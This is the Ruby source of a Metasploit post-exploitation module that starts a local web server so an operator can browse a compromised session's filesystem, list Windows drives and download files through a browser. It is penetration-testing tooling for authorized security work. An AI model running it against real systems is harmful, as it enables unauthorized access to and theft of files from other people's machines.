modules/post/multi/manage/fileshare.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'cgi'
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Browse the session filesystem in a Web Browser',
'Description' => %q{
This module allows you to browse the session filesystem via a local
browser window.
},
'License' => MSF_LICENSE,
'Author' => [ 'timwr'],
'Platform' => [ 'linux', 'win', 'osx' ],
'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
'Notes' => {
'Reliability' => [ ],
'SideEffects' => [ ],
'Stability' => [ CRASH_SAFE ]
}
)
)
end
def run
exploit
end
def primer
uri = get_uri.chomp('/') + '/'
current_dir = pwd
if session.platform == 'windows'
current_dir = current_dir.gsub('\\', '/')
end
print_status("Current directory: #{uri}#{current_dir}")
end
def list_path(file_path, uripath)
contents = []
if file_path == '/' && session.platform == 'windows'
get_drives.each do |drive|
driveurl = drive + ':/'
furl = uripath + driveurl
contents << [furl, driveurl]
end
return contents
end
base_url = uripath
if file_path.starts_with?('/')
base_url = base_url.chomp('/')
end
base_url += file_path.chomp('/') + '/'
dir(file_path).each do |file|
next if ['.', '..'].include?(file)
furl = base_url + file
contents << [furl, file]
end
contents
end
def handle_response(cli, request_uri)
uripath = get_resource.chomp('/')
# Convert http://127.0.0.1/URIPATH/file/ -> /file
if request_uri != uripath && request_uri.starts_with?(uripath)
file_path = request_uri[uripath.length, request_uri.length].chomp('/')
end
if file_path.blank?
file_path = '/'
end
uripath += '/'
# Convert /C: -> C:/
if session.platform == 'windows'
if file_path.starts_with?('/')
file_path = file_path[1, file_path.length]
end
if /([A-Z]):$/ =~ file_path
file_path += '/'
end
end
if file_path.blank?
file_path = '/'
end
print_status("Request uri: #{request_uri} file_path: #{file_path} from #{cli.peerhost}")
root_dir = (file_path == '/')
if file?(file_path) && !root_dir
# Download the file
data = read_file(file_path)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
return
elsif directory?(file_path) || root_dir
# List the directory
body = "<h2>Directory listing for #{CGI.escapeHTML(file_path)}</h2><hr>"
body << "<ul>\n"
unless root_dir
basedir = request_uri[0, request_uri.chomp('/').rindex('/')]
if basedir.blank?
basedir = '/'
end
body << "<li><a href=\"#{CGI.escapeHTML(basedir)}\">..</a>\n"
end
list_path(file_path, uripath).each do |furl, fname|
body << "<li><a href=\"#{CGI.escapeHTML(furl)}\">#{CGI.escapeHTML(fname)}</a>\n"
end
body << "</ul>\n"
html = %(<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<title>Metasploit File Sharing</title>
</head>
<body>
#{body}
</body>
</style>
</html>
)
send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
else
send_not_found(cli)
end
end
def on_request_uri(cli, request)
handle_response(cli, request.uri)
rescue ::Rex::Post::Meterpreter::RequestError
cli.send_response(create_response(500, 'Unknown error'))
end
end